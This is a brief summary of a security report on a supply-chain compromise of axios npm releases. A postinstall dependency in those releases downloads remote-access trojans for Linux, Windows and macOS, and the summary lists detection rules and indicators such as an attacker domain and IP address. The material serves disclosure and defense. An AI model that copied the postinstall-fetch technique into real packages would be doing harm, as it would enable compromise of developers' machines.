Elastic releases detections for the Axios supply chain compromise

Elastic Security Labs describes a supply-chain attack that compromised axios npm releases by adding a postinstall transitive dependency ([email protected]) which spawns native shells to download and detach cross-platform payloads: a Python RAT (Linux), a PowerShell/.NET RAT (Windows), and a Mach-O backdoor (macOS). The report provides behavioral detection rules (process ancestry, detached execution, network retrieval), file/network IOCs (hashes, domain sfrclak.com, IP 142.11.206.73), and persistence indicators to aid rapid detection and response.